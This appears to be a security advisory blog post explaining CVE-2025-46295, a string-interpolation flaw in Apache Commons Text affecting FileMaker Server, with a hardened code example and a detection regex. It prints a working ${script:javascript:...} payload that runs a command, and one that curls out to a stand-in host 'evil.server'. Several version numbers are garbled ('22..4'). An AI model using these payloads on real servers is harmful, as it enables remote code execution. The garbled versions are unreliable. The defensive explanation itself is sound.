CVE-2025-46295 is the identifier for a high-risk vulnerability in Apache Commons Text, a widely used Java library. In this long read, we’ll break down what caused the issue, show you a real code example, and explain how attackers could exploit it—especially in the context of FileMaker Server, which patched this hole in version 22..4.

What is Apache Commons Text?

Apache Commons Text is a library that gives Java developers handy tools for working with and manipulating strings. One of its big features is “string interpolation”—basically, the ability to substitute variables or commands using placeholders in text, like ${name}.

The Danger: Interpolation Abuse Before 1.10.

Before version 1.10., Commons Text included "interpolators" that would process not only variable lookups but also commands and resource URLs.

Here’s the trap: if an application feeds _untrusted input_ (like user input) to the text interpolation feature, a malicious user could craft inputs that get executed—think running system commands or hitting external servers.

Why does this matter? If you’re using a vulnerable version, a bad actor could potentially run code on your server. That’s called remote code execution (RCE), which is one of the worst things that can happen to an application server.

Here’s a simplified example in Java of how this can go wrong:

import org.apache.commons.text.StringSubstitutor;

public class VulnerableExample {
    public static void main(String[] args) {
        // Imagine 'input' comes from a user:
        String input = "${script:javascript:java.lang.Runtime.getRuntime().exec('touch /tmp/pwned')}";

        // Dangerous: createInterpolator() attaches the default lookups (script:, dns:, url:, ...),
        // so a ${script:...} reference inside user input is evaluated instead of treated as text.
        // (A bare `new StringSubstitutor()` has no lookup attached and would leave it unresolved.)
        StringSubstitutor substitutor = StringSubstitutor.createInterpolator();
        String output = substitutor.replace(input);

        System.out.println(output);
    }
}

When replace() runs, it actually tries to execute the embedded command.

- In real-world servers with a vulnerable setup, this could create files, open connections, or even take over your whole system.
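For contrast, here is an added example (not code from the original post or from the Commons Text project) showing the vulnerable call beside a hardened shape: untrusted text is passed as a value into an allow-listed map lookup, the interpolator (if one is needed at all) is built without the default lookups, and a small regex flags inputs that carry the dangerous prefixes so they can be logged. Class and method names are hypothetical; the sample input is constructed.

```java
import java.util.Map;
import java.util.regex.Pattern;
import org.apache.commons.text.StringSubstitutor;
import org.apache.commons.text.lookup.StringLookup;
import org.apache.commons.text.lookup.StringLookupFactory;

public class SafeTemplating {

    // The application's own template; only ${user} is meant to be filled in.
    static final String TEMPLATE = "Hello, ${user}!";

    // Constructed sample of untrusted input that tries to reach the script lookup.
    static final String UNTRUSTED = "${script:javascript:1+1}";

    // Vulnerable shape (pre-1.10 defaults): the interpolator resolves script:, dns: and url:
    // prefixes, so any ${prefix:...} in the input is acted on rather than echoed back.
    static String renderVulnerable(String untrustedTemplate) {
        return StringSubstitutor.createInterpolator().replace(untrustedTemplate);
    }

    // Hardened shape: untrusted text is a value, never a template, and the substitutor can
    // only resolve keys present in the map. Unknown ${...} references are left as literal text.
    static String renderSafe(String template, Map<String, String> values) {
        StringLookup allowedOnly = StringLookupFactory.INSTANCE.mapStringLookup(values);
        StringSubstitutor sub = new StringSubstitutor(allowedOnly);
        sub.setEnableSubstitutionInVariables(false); // no nested ${${...}} resolution
        sub.setDisableSubstitutionInValues(true);    // resolved values are never re-interpolated
        return sub.replace(template);
    }

    // If an interpolator is genuinely required, build it without the default lookups so that
    // only the explicitly supplied lookups (here: just the map) are reachable.
    static StringSubstitutor restrictedInterpolator(Map<String, String> values) {
        StringLookup base = StringLookupFactory.INSTANCE.mapStringLookup(values);
        StringLookup interp = StringLookupFactory.INSTANCE
                .interpolatorStringLookup(Map.of(), base, /* addDefaultLookups */ false);
        return new StringSubstitutor(interp);
    }

    // Detection aid for request logs or WAF rules: flags input carrying the dangerous prefixes.
    static final Pattern PROBE =
            Pattern.compile("\\$\\{\\s*(script|dns|url)\\s*:", Pattern.CASE_INSENSITIVE);

    static boolean looksLikeInterpolationProbe(String input) {
        return PROBE.matcher(input).find();
    }

    public static void main(String[] args) {
        // The untrusted text survives as inert characters inside the greeting.
        System.out.println(renderSafe(TEMPLATE, Map.of("user", UNTRUSTED)));
        System.out.println(looksLikeInterpolationProbe(UNTRUSTED));
    }
}
```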

How Attackers Exploit This

A malicious user could send specially crafted data (usually via a web form or API call) to a server-side Java application that calls the interpolation API directly on that input.

Example exploit payload

${script:javascript:java.lang.Runtime.getRuntime().exec('curl https://evil.server/1234')}

This would make the server connect out to an attacker’s system!

Impact on FileMaker Server

FileMaker Server, a database and app server from Claris (an Apple subsidiary), used an unsafe version of Apache Commons Text. If you used FileMaker Server before version _22..4_, your server may have been at risk for RCE if it passed unfiltered input to interpolation APIs anywhere in its Java components.

Patched Version:
FileMaker Server fixed this in version 22..4.

References

- Apache Commons Text Security Page
- FileMaker Server 22..4 Release Notes
- OSS Security Mailing List Post about Commons Text Flaw

Conclusion

CVE-2025-46295 is a clear reminder that seemingly helpful features (like text interpolation) can become dangerous if not handled carefully. Always validate your library versions, avoid ever letting untrusted input reach sensitive APIs, and patch quickly!

If you run FileMaker Server or use Apache Commons Text anywhere in your Java stack, update now—or your server could be someone else’s playground.

Timeline

Published on: 12/16/2025 18:16:12 UTC
Last modified on: 12/18/2025 15:08:06 UTC